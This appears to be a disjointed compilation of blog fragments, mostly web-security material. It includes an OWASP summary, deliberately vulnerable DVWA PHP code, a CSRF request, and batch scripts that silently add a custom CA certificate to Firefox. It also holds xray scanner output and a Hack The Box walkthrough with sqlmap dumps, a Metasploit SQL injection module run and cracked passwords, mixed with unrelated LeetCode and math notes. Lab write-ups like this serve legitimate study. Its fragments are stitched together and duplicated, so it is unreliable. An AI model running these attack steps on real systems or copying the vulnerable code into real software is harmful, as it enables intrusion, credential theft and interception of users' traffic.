The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
+
+
注入
+
失效的身份验证
+
敏感信息泄露
+
XML外部实体(XXE)
+
失效的访问控制
+
安全配置错误
+
跨站脚本(XSS)
+
不安全的反序列化
+
使用含有已知漏洞的组件
+
不足的日志记录和监控
+
+
+
+
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
+
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
+
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
+
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
+
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
+
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
+
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
+
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
+
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
+
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
%% extract watermark FA2=fft2(FAO); G=(FA2-FA)/alpha; GG=G; fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(M(i),N(j),:)=G(i,j,:); end end fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:); end end figure,imshow(GG);title('extracted watermark'); %imwrite(uint8(GG),'extracted watermark.jpg');
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+
It does not depend on a browser, so you can even run it on Node.js.
+
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
任何多项式可以写为:f(x)=q(x)g(x)+r(x) r(x)称为余式 r(x)=f(x) mod g(x)
+
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
+
若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
+
系数在GF(p)中,以素多项式取模的多项式构成一个域
+
欧几里得算法
+
1 2 3 4 5 6 7
a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b 假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。 而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r 因此d也是b,a mod b的公约数 假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数, 进而d|a.因此d也是a,b的公约数 因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。
+
+
1 2 3 4 5
对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) 同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b) 由此可知:gcd(a,b)=gcd(a-b,b) 因为总有整数n,使得 a - n*b = a mod b, 所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
递归方法 classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: m=len(matrix) if m==0orlen(matrix[0])==0: return [] n=len(matrix[0]) newlist=matrix[0] if m>1:
for i inrange(1,m): newlist.append(matrix[i][n-1])
for j inrange(n-2,-1,-1): newlist.append(matrix[m-1][j]) if n>1: for i inrange(n-2,0,-1): newlist.append(matrix[i][0]) M=[] for k inrange(1,m-1): t=matrix[k][1:-1] M.append(t)
思路清晰方法: classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: res=[] iflen(matrix)==0: return [] #定义四个边界点 left=0 right=len(matrix[0])-1 top=0 bottom=len(matrix)-1 #在不超过边界的条件下,进行一轮循环 while (top<bottom and left<right): for i inrange(left,right): res.append(matrix[top][i]) for i inrange(top,bottom): res.append(matrix[i][right]) for i inrange(right,left,-1): res.append(matrix[bottom][i]) for i inrange(bottom,top,-1): res.append(matrix[i][left]) left+=1 top+=1 right-=1 bottom-=1 #如果剩余1行或1列:left=0 right1 if top==bottom: for i inrange(left,right+1): res.append(matrix[top][i]) elif left==right: for i inrange(top,bottom+1): res.append(matrix[i][left]) return res
// Checks to see where the request came from if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ];
+
+
对referer进行了检查
+
1 2 3 4 5 6 7 8 9
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 Host: 49.232.78.252:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Referer: http://49.232.78.252:81/vulnerabilities/csrf/ Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium Upgrade-Insecure-Requests: 1
// Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo'<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo"<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } }
// Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );
// Did the CAPTCHA fail? if( !$resp ) { // What happens when the CAPTCHA was entered incorrectly $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo" <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> <form action=\"#\" method=\"POST\"> <input type=\"hidden\" name=\"step\" value=\"2\" /> <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> <input type=\"submit\" name=\"Change\" value=\"Change\" /> </form>"; } else { // Both new passwords do not match. $html .= "<pre>Both passwords must match.</pre>"; $hide_form = false; } } }
// Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new );
// Feedback for the end user echo"<pre>Password Changed.</pre>"; } else { // Issue with the passwords matching echo"<pre>Passwords did not match.</pre>"; $hide_form = false; }
?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> ';
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections Blind SQL and Blind OS Command injection Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL) Cross-Site Scripting (XSS) and Cross-Site Tracing (XST) Cross-Site Request Forgery (CSRF) AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL) Malicious, unrestricted file uploads and backdoor files Authentication, authorization and session management issues Arbitrary file access and directory traversals Local and remote file inclusions (LFI/RFI) Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,... HTTP parameter pollution and HTTP response splitting Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues Unvalidated redirects and forwards, and cookie poisoning Cookie poisoning and insecure cryptographic storage Server Side Request Forgery (SSRF) XML External Entity attacks (XXE) And much much much more…
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H -A Add a certificate to the database (create if needed) -E Add an Email certificate to the database (create if needed) -n cert-name Specify the nickname of the certificate to add -t trustargs Set the certificate trust attributes: p valid peer P trusted peer (implies p) c valid CA T trusted CA to issue client certs (implies c) C trusted CA to issue server certs (implies c) u user cert w send warning g make step-up cert -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -a The input certificate is encoded in ASCII (RFC1113) -i input Specify the certificate file (default is stdin)
-C Create a new binary certificate from a BINARY cert request -c issuer-name The nickname of the issuer cert -i cert-request The BINARY certificate request file -o output-cert Output binary cert to this file (default is stdout) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
-G Generate a new key pair -h token-name Name of token in which to generate key (default is internal) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -g key-size Key size in bits, (min 512, max 2048, default 1024) -y exp Set the public exponent value (3, 17, 65537) (rsa only) -f password-file Specify the password file -z noisefile Specify the noise file to be used -q pqgfile read PQG value from pqgfile (dsa only) -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-D Delete a certificate from the database -n cert-name The nickname of the cert to delete -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-U List all modules -d moddir Module database directory (default is '~/.netscape') -P dbprefix Cert & Key database prefix -X force the database to open R/W
-K List all keys -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens) -k key-type Type of key pair to list ("all", "dsa", "rsa" (default)) -f password-file Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-L List all certs, or print out a single named cert -n cert-name Pretty print named cert (list all if unspecified) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W -r For single cert, print binary DER encoding -a For single cert, print ASCII encoding (RFC1113)
-M Modify trust attributes of certificate -n cert-name The nickname of the cert to modify -t trustargs Set the certificate trust attributes (see -A above) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-N Create a new certificate database -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-T Reset the Key database or token -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -h token-name Token to reset (default is internal)
-O Print the chain of a certificate -n cert-name The nickname of the cert to modify -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-R Generate a certificate request (stdout) -s subject Specify the subject name (using RFC1485) -o output-req Output the cert request to this file -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -f pwfile Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -a Output the cert request in ASCII (RFC1113); default is binary
-V Validate a certificate -n cert-name The nickname of the cert to Validate -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]") -e Check certificate signature -u certusage Specify certificate usage: C SSL Client V SSL Server S Email signer R Email Recipient -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-S Make a certificate and add to database -n key-name Specify the nickname of the cert -s subject Specify the subject name (using RFC1485) -c issuer-name The nickname of the issuer cert -t trustargs Set the certificate trust attributes (see -A above) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled
set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg%" ( copy "%source_file_cfg%" "%dest_dir_cfg%" ) else ( echo Directory %dest_dir_cfg% does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg_x86%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg_x86%" ( copy "%source_file_cfg%" "%dest_dir_cfg_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set source_file_js=C:\firefoxinstallcert\local-settings.js set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js%... if exist "%source_file_js%" ( if exist "%dest_dir_js%" ( copy "%source_file_js%" "%dest_dir_js%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. ) set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js_x86%... if exist "%source_file_js%" ( if exist "%dest_dir_js_x86%" ( copy "%source_file_js%" "%dest_dir_js_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. )
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled
::profiles默认配置文件目录 set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles" ::搜索存在default字符串的文件夹,即profiles配置文件夹 set "searchString=default" set source_user_js=C:\firefoxinstallcert\user.js ::将user.js文件拷贝到配置文件目录
IF EXIST %parentFolder% ( for /d %%F in ("%parentFolder%\*") do ( echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1 if errorlevel 1 ( echo default Folder not found. ) else ( echo default Folder found. rem 拼接全路径 set "all_default_path=%parentFolder%\%%~nxF" echo !all_default_path! copy "%source_user_js%" !all_default_path! ) ) ) ELSE ( echo no ) goto :eof pause
COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint lint yaml poc burp-gamma, btg Convert the export file of burp historical proxy records to POC format transform transform other script to gamma reverse Run a standalone reverse server convert convert results from json to html or from html to json genca GenerateToFile CA certificate and key upgrade check new version and upgrade self if any updates found version Show version info x A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file. help, h Shows a list of commands or help for one command
GLOBAL OPTIONS: --config FILE Load configuration from FILE (default: "config.yaml") --log-level value Log level, choices are debug, info, warn, error, fatal --help, -h show help [INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
OPTIONS: --list, -l list plugins --plugins value, --plugin value, --plug value specify the plugins to run, separated by ',' --poc value, -p value specify the poc to run, separated by ',' --level value specify the level of poc to run, separated by ',' --tags value specify the level of poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111) --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests --url-file value, --uf value read urls from a local file and scan these urls, one url per line --burp-file value, --bf value read requests from burpsuite exported file as targets --url value, -u value scan a **single** url --data value, -d value data string to be sent through POST (e.g. 'username=admin') --raw-request FILE, --rr FILE load http raw request from a FILE --force-ssl, --fs force usage of SSL/HTTPS for raw-request
--json-output FILE, --jo FILE output xray results to FILE in json format --html-output FILE, --ho FILE output xray result to FILE in HTML format --webhook-output value, --wo value post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml [INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details) [INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/ [Vuln: phantasm] Target "http://example.com/" VulnType "poc-yaml-jumpserver-session-replay-unauth/default" Author "Chaitin" Links ["https://stack.chaitin.com/techblog/detail/156"]
[*] All pending requests have been scanned [*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00% [INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─# nmap -sV $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
+
+
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema
[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# ftp metapress.htb@$IP Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash 运行john时报错:
+
1
Crash recovery file is locked: /root/.john/john.rec
+
+
解决方法:
+
1
rm /root/.john/john.rec
+
+
开始爆破:
+
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
+
+
+
+
+ graph LR
+ A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
+ C -->|Yes| D[Execute<br>JNDI lookup]
+ C -->|No| E[Normal log]
+ D --> F[Connect to<br>attacker's server]
+ F --> G[Download &<br>execute<br>malicious codes]
+ G --> H[Attacker gains<br>server control]
+
+
+
+
+
+
+
+
+
